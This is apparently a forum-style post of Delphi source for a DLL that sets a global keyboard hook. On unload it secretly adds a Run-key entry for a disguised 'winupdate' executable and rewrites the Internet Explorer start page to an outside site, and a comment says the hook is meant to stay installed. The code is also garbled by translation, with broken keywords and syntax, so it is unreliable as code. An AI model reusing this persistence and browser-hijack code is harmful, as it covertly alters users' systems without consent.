DLL global hook
// The following uses a memory map file sharing data to save the keyboard hook and DLL handle // Run this program: After the trigger program is loaded with the DLL, you will hook yourself on other systems, and even if the trigger procedure, DLL Or the monitoring keyboard response event automatically hook // until you press the Ctrl F key DLL to uninstall it from memory .Library sysinfo; uses windows; const buffer_size = 16 * 1024; const hook_mem_filename = 'mem_file'; type TShared = record KeyHook: HHook; Moudle: THandle; end; pShared = ^ TShared; var memFile: THandle; Shared: pShared; {withdraw the hook filter function} function UninstallHook: Boolean; begin Freelibrary (Shared ^ .Moudle); Result: = UnHookWindowsHookEx (Shared ^ .KeyHook); UnmapViewOfFile (Shared); CloseHandle (memFile); end; function KeyHookProc (iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export; const KeyPressMask = $ 80000000; begin if iCode <0 THEN Result: = CallNexthooKex (Shared ^ .keyhook, icide, wparam, lparam) Else Beginiff = 0) and (getKeyState (VK_Control) <0) and (wparam = ORD ('f') ) The begin windows.MessageBox (0, '........ The hook has been eliminated! ........', 'Hello!', MB_ICONEXCLAMATION; Uninstallh ook; end; // result: = 0; Result: = CallNextHookEx (Shared ^ .KeyHook, iCode, wParam, lParam); end; end; function InstallHook: Boolean; begin Shared ^ .Moudle: = GetModuleHandle (PChar ( 'sysinfo ')); Shared ^ .keyhook: = setwindowshookex (wh_keyboard, @keyhookproc, shared ^ .moudle, 0); if Shared ^ .Keyhook = 0 The begin Result: = false; End; End; Result: = true; end; // The following is the write registry section, defines a function Procedure WriteRegedit (CCustomLog, Var1, Var2: Pchar); var size: integer; s: string; tempkey: hkey; fdisposition: Pointer; Begin fdisposition: = nil;
if RegCreateKeyEx (HKEY_LOCAL_MACHINE, cCustomLog, 0, nil, REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, TempKey, fDisposition) = ERROR_SUCCESS then begin RegSetValueEx (TempKey, var1, 0, REG_SZ, var2, length (var2)); end; RegCloseKey (TempKey); end; procedure DllEntry (dwReason: integer); begin case dwReason Of // DLL_PROCESS_ATTACH when DLL import process: begin memFile: = OpenFileMapping (FILE_MAP_WRITE, False, HOOK_MEM_FILENAME); if memFile = 0 then memFile: = CreateFileMapping ($ FFFFFFFF, nil, Page_readwrite, 0, sizeof (tshared), hook_mem_filename; shared: = mapviewoffile (Memfile, File_MAP_WRITE, 0, 0, 0); // load hook InstallHook; end; DLL_PROCESS_DETACH: begin writeregedit ( 'SOFTWARE / Microsoft / Windows / CurrentVersion / Run', 'winupdate', 'c: /windows/winh1p32.exe'); WriteRegedit ('Software / Microsoft / Internet Explorer / Main', 'Start Page', 'http://www.iou.com'); // I don't want to uninstall the hook // uninstallhook; end; else; end; Exports installhook; begin dllproc: = @dllentry; dllenTry (dll_process_attach); end. Dizzy:
